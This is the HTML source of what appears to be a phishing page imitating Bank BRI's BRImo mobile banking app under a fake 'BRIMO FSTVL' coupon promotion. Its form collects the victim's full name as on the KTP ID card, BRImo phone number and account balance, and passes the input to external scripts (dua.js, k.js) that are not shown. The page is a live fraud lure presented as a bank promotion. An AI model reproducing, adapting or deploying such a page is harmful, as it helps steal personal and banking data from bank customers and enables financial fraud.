<!DOCTYPE html>
<html lang="in">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="theme-color" content="#0F78CB">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<title>BRIMO FSTVL</title>
<meta name="description" content="">

<!-- Facebook Meta Tags -->
<meta property="og:url" content="https://www.dana.id">
<meta property="og:type" content="website">
<meta property="og:description" content="">
<meta property="og:image" content="">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      width: 100%;
      max-width: 400px;
      margin: 0 auto;
      }
body {
    margin: 0px;
    background: ,#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
    max-width: 400px;
    max-height: 100vh;
    align-item: center;
    justify-content: center;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    margin-bottom: 110vh;
}

.lonte{
  display:none;
  z-index:3;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  max-width: 400px;
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     margin: 0 auto;
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     max-width: 400px;
      }
      
      .jao{
            width:90%;
      }
      
 welalxcome {
    position: fixed;
    right: 0;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    margin: 0 auto;
    max-width: 400px;
    background: #ffffffcc;
    z-index: 999;
}
welalxcome img {
        width:15vw;
    height: auto;
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}


 
 .asu{
     width:100%;
     margin-top:55px;
     position: fixed;
     height: 100%;
     max-width: 400px;
     
 }  
    
 .nyusu{
     border-radius:7px;
     height:150px;
     max-width: 400px;
     margin-top: 20px;
     margin-left: 20px;
     box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;
     
 }
 
 ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -2px;
    position: absolute;
    color: #06529C;
}

.button-85 {
  background-color: ;
  max-width: 400px;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 18px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  background: ;
  left: 0;
  top: 0;
  border-radius: none;
}
.patokk{
    max-width: 400px;
    margin: 0px auto;   
    position:relative;
    background-color:#0F78CB;
    color:#fff;
    border:0px solid #0076e0;
    width:90%;
    border-radius:3px;
    font-family: 'Nunito',sans-serif;
    font-size: 15px;
    padding: 13px;
    display: block;
    text-align: center;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,
rgba(0, 0, 0, 0.20) 0px 6px 6px;
}

.patokk:hover { 
         
     opacity:0.3;
     border: 1px solid #0F78CB; 
     background-color: #0F78CB; 
     color: #fff; 
         
         
         } 
.patokk:disabled, 
.patokk[disabled]{
    
    opacity:0.3;
    border: 1px solid #0F78CB; 
    background-color: #0F78CB; 
    color: #fff;
}

.pilat{
    max-width: 400px;
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    width: 100%;
    height: 72px;
    background: #ffffff;
    box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px;
padding-top: 15px
}

.hh {
  z-index: 99999999;
  position: fixed;
  top: 0px;
  left: 0;
  right: 0;
  margin: 0px auto;
  width: 100%;
  height: 50px;
  background: #0F78CB;
  border-bottom: 0px solid #fff;
  box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
}
    
    .hua{
        max-width: 320px;
        bottom:135px;               
        position: absolute;
        border:5px solid #fff;
        padding:15px;
        width:80%;
        border-radius:18px; 
        background: #ffffffe6;
        background-size:78%; 
        height: 298px; 
        left: 0;
        right: 0;
        margin: 0px auto;
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
    }
    
.yantek{
max-width: 400px;
box-sizing: border-box;
height: 35px;
width: 536px;
max-width: 100%;
border: 1px solid rgb(0, 134, 224);
border-image: initial;
background-color: rgb(255, 255, 255);
border-radius: 10px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px,
rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;
font-family: 'Nunito',
sans-serif;
font-weight: bold;
font-size: 14px;
color: rgb(28, 28, 28);
word-spacing: 0px;
padding: 0px 10px;
outline: none;
margin-top: -15px;
padding-left: 10px;
    }
    
    .kk{
        box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px;
    }
    
    .kutal{
        position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #ffffff; box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px; padding-top: 15px;max-width: 400px;
    }
      .radio-item [type="radio"] {
	display: none;
}
.radio-item + .radio-item {
	margin-top: 5px;
}
.radio-item label {
	display: block;
	padding: 5px 8px;
	background: transparent;
	border: 2px solid #09559a;
	border-radius: 20px;
	cursor: pointer;
	font-size: 12px;
	font-weight: 400;
	min-width: 270px;
	padding-left: 0px;
	color: #09559a;
	margin: 5px auto;
	top:10px;
	margin-bottom:10px;
	position: relative;
	
}
.radio-item label:after,
.radio-item label:before {
	content: "";
	position: absolute;
	border-radius: 50%;
}
.radio-item label:after {
	height: 20px;
	width: 20px;
	border: 1px solid #09559a;
	left: 9px;
	top: calc(50% - 11px);
}
.radio-item label:before {
	background: #09559a;
	height: 17px;
	width: 17px;
	left: 11.2px;
	top: calc(50% - 9.8px);
	transform: scale(5);
	opacity: 0;
	visibility: hidden;
	transition: 0.4s ease-in-out 0s;
}
.radio-item [type="radio"]:checked ~ label {
	border-color: #F8B13B;
}
.radio-item [type="radio"]:checked ~ label::before {
	opacity: 1;
	visibility: visible;
	transform: scale(1);
	margin-top: 0.9px;
}
      .radio-section {
	display: flex;
	align-items: center;
	justify-content: center;
	height: 100vh;
	width:;
}
</style>
<body>
    <main>

</welalxcome>
<chsalxcome2 style="display: non;">
<img style="z-index:-1;position: fixed;width:100%;margin-top:0px;max-width: 400px;left: 0;right: 0;margin: 0px auto;" width="100%" src="" alt="">
<img style="position: fixed;width:100%;margin-top:30px;max-width: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzNvUoQZs472wLT0OBfqf3IaxbfNMkYJ-RlrcaCCFjgE9XHS9YIY_e3ERerB7kmqKG6xqqAxJq-K-YHdKht6GQ5PrKnLs_W5BjN5kQfI6SNsYGUIrQ3FSRVJoeyJYiCIlEC5luQ7cxG7xMSUSRodCQxaJ6ftAFNTyNOOFLayHCvFonc_S3bcDGCw2f6HM/s2180/AddText_11-19-06.54.17.jpg" alt="">
<nav class="hh">
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmaqSV_5oSZYc_fIrO6tbjt2ob2FshZJYcK8VykU6o8YvOq28yq9n0rlPKI-usJjG7tYiiKmN7_zXZMezkX4eodLeAL5ii7_M5ARQKgImyI679MXaERtSuW0mIOYHPI_3wAYDXBZdvfbX_Xpcs4wU1jXFk2JCdwQFo_U-Kg_W1BSmajJG6BuwZ5gOTLQHW/s101/nav.png" style="margin-top:8px;" width="35px" alt=""></center></nav>
<div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<marquee direction="right" behavior="alternate" scrolldelay="0" class="asu" style="display: block;animation: marquee 5000s linear infinite;overflow: hidden;">
  <img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMGwhsFEJ-U3Gd9CKN3Wiw8UMI_bEmvfgnhjAbC_6QnntVyl51woX2ZzTHELOOLFYPKUGEIjqR7rDYt5OqqzczKv2VGGxW0uyGmirtQUMcd9DxIcFTyqbcnpiB9RyfQmaUdQvSn2YtlFKbPkrtUaRm1Fu0QuK9BgkzHHGPFm5yCk6Mpe6LODOOdpbM02OD/s728/1.png" alt="">
  <img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0gnbxt2ynru_bbVfZ73OorOmOyUyMM0VMEOKMdRRi_z3Qq9Dhn8SfZyezNzGw269YSRQ-VLbmLUdznkKc-B5brcYd6s0WjZm804-p6LraG5kEXurxepy_moLFA26Hsk5q6ato3YVb_YSh5aX67VRlOS_qgRHcjiOKZRayC-NCmAPxJWgjiYzSVN5R0__v/s728/2.png" alt="">
  <img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqTwIRJnT7GmExya2Tbsz91Cdzj29b9NEIl7BkrGdTQaqi19nF-hODeCrOFQOJ8zvThy2SrkU6ECtfffSdSZZiAlUkzGhYAQEMIVkEV1rsNZPBBdGAKOXTxgANv5MD7HziSvw724w3aHxSEyGCURbAYDU93qXNboWsWExXy0E1ddddVNlDHi0HNSyrzBZf/s728/3.png" alt="">
  <img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjd1uXRFz6HanPWt2KgF3iUiRyQPL3un-OEoqIh-v5sjfRMujpnfSCDYV_2hnN6HWO8cIiXZcbCnXw5HdIWjWRxIvmQhWGGaTZXDn87IHmRZOoNbQ9wGkeONDHU1_26pb7a65Ku2zh36d_UDC2Qccr5WP2zTnX-67xy4JGdikuG513dZGE2fiywWVGLkis/s728/4.png" alt="">
  <img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicCW2ZXBp8MAPl8gOXKiBrjAYoIDCzrv0YD3kENwm_r2_gnPT1KTK8-nVSX5mcudmvIic8zdLAzzykRIKP8Nqb9_sJdkgeGFb6WohG78nz4R1GZENhXp2kD7atlMf_6UMJbdD8Xi_B96SsAmLxNUbuhYl-Jn0-meylZymD15qpqwc-aZNGGnwHIWQHTRdx/s748/5.png" alt="">
</marquee>



<form  id="dua" onclick="">
 <input type="hidden" name="logo" id="logo" value="𝗕𝗮𝗻𝗸 𝗕𝗥𝗜">

<div class="button-85 hua">
<center style="color:#09559a; line-height: 20px; font-size: 14px; padding: 0px;margin-top:-12px;"><p style="border-bottom:1.5px solid #06529C;border-radius:20px;margin-bottom:5px;height:20px;">LENGKAPI DATA PENCETAKAN KUPON</p><br>
<br><br>
<h5 style="position:absolute;color:#09559a; margin-top: -30px; margin-left: 4px">Masukkan Nama <b style="color: #06529C">Leng</b><b style="color: #F37024">kap</b> Anda :</h5>
<ion-icon name="person-outline" for="nama"></ion-icon>
<input id="Nama" name="Nama" type="teks" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 99%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 15px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px" placeholder="Nama Sesuai KTP" required maxlength="" minlength="">
</h3>
</select></center>

<br><br>
<h5 style="position:absolute;color:#09559a; margin-top: -30px; margin-left: 4px">Masukkan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>
<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input id="NoHp" name="Nomor HP" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 99%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px" placeholder="08xxxxxx" required maxlength="13" minlength="10">
<br>
<h5 style="color:#09559a; margin-top: 10px; margin-left: 4px"> </5>
  <br>
  <h5 style="position:absolute;color:#09559a; margin-top: -28px; margin-left: 4px">Masukkan Saldo Rekening Bank Anda :</h5>
<ion-icon name="server-sharp"></ion-icon>
<input class="uang" id="saldo" name="saldo" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 99%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px" placeholder="Rp. xxxxx" required maxlength="" minlength="">
</h3>

<br>
<br>
<div style="position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #fff; box-shadow: rgba(0, 0, 0, 0.15) 5px 5px 15px 0px; padding-top: 15px">
<button type="submit" id="kirims" style="margin-left: 20px;margin-top: ;position:absolute;background-color:#0F78CB;color:white;border:0px solid #0076e0;width:90%;border-radius:25px;font-family: 'Nunito', sans-serif;font-size: 15px;padding:13px;display: inline-block; box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;" >Lanjutkan</button>
           </div>
</form>






</smalxs>
</main>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script type='text/javascript' src='k.js'></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script>
      $(document).ready(function() {
        setTimeout(() => {
          $('welalxcome').hide();
          $('chsalxcome2').fadeIn();
        }, 500)
      });
    </script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
    <script src="jquery.min.js"></script>

    <script type="text/javascript">
      $(document).ready(function() {

        // Format mata uang.
        $('.uang').mask('000.000.000.000', { reverse: true });
        var dengan_rupiah = document.getElementById('saldo');
        dengan_rupiah.addEventListener('keyup', function(e)
        {
          dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
        });


        /* Fungsi */
        function formatRupiah(angka, prefix)
        {
          var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split = number_string.split(','),
            sisa = split[0].length % 3,
            rupiah = split[0].substr(0, sisa),
            ribuan = split[0].substr(sisa).match(/\d{3}/gi);

          if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
          }

          rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
          return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
        }
      })
      
</script>
   <p id="status"></p>
   <script src="dua.js"></script>
   
   <script>
   

</script>
</body>
  </html>
  
